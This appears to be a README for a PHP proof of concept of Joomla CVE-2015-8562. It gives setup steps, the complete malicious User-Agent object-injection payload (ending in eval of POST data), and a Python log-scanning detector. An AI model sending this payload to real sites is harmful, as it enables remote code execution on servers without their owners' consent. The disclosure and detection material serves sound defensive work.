# Joomla-CVE-2015-8562-PHP-POC
A proof of concept for Joomla's CVE-2015-8562 vulnerability

## Intro
This PoC is a near 1:1 copy of Gary's Python implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/38977/).
## Use it
It's very easy to install:
```
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
```
Once Composer has installed everything, you'll need to change `$target` in `exploit.php`.
After that you're ready to go:
```
php exploit.php
```
### CVE-2015-8562
In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.
This vulnerability hit *all* versions of Joomla. A patch for v1.5.x, v2.5.x and v3.x has already been [released](https://github.com/joomla/joomla-cms/releases/tag/3.4.6).
If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine, because this exploit also depends on [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219).
Nikos Verschore from PatrolServer wrote a very detailed [blog post](https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/) that was a major help in understanding this vulnerability. You can use their [mini-scanner](https://scan.patrolserver.com/joomla/CVE-2015-8562) for free to check if your site is at risk.
#### The real exploit
This is what the sent `User-Agent` header looks like:
```
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}
```
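For defenders, a header like the one above leaves a recognizable trace in web-server access logs. The following Python script is an added example, not part of this repository or of the exploit-db code: it flags combined-format log lines whose `User-Agent` contains PHP serialized-object notation. The log lines are constructed samples, and the function names are assumptions of this example.

```python
import re

# One double-quoted field of the combined log format; backslash escapes allowed.
_Q = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _Q + r' (\d{3}) \S+ ' + _Q + ' ' + _Q + r'\s*$')
# PHP serialize() object notation: O:<len>:"<ClassName>":<count>:{
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z_][\w\\]*":\d+:\{')
# Session-format "|" delimiter directly in front of an object, as in the header above.
SESSION_DELIM = re.compile(r'\|O:\d+:"')
# Class and property names that appear in the header shown on this page.
PAGE_MARKERS = ("JDatabaseDriverMysqli", "JSimplepieFactory", "disconnectHandlers")

# Constructed sample lines (documentation IP ranges, shortened User-Agent values).
SAMPLE_LOG = [
    r'192.0.2.10 - - [15/Dec/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'198.51.100.7 - - [15/Dec/2015:10:00:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "jklmj}__jklmjklmjk|O:21:\"JDatabaseDriverMysqli\":3:{}"',
    r'203.0.113.9 - - [15/Dec/2015:10:00:03 +0000] "GET / HTTP/1.1" 200 5123 "-" "x|O:8:\x22stdClass\x22:0:{}"',
]

def unescape(field):
    # Undo the quote escaping applied in access logs: nginx writes \x22, Apache writes \".
    return field.replace(r'\x22', '"').replace(r'\"', '"')

def inspect_user_agent(ua):
    """Return the reasons a User-Agent value looks like PHP object injection."""
    ua = unescape(ua)
    reasons = []
    if SERIALIZED_OBJECT.search(ua):
        reasons.append("serialized-object")
    if SESSION_DELIM.search(ua):
        reasons.append("session-delimiter")
    hits = [name for name in PAGE_MARKERS if name in ua]
    if hits:
        reasons.append("markers:" + ",".join(hits))
    return reasons

def scan(lines):
    """Return (client_ip, timestamp, reasons) for each line with a suspicious User-Agent."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        reasons = inspect_user_agent(m.group(6)) if m else []
        if reasons:
            findings.append((m.group(1), m.group(2), reasons))
    return findings

if __name__ == "__main__":
    for ip, ts, reasons in scan(SAMPLE_LOG):
        print(ip, ts, reasons)
```

A match shows that a request carried such a header, not that the site was compromised; whether the payload could run depends on the Joomla and PHP versions listed above.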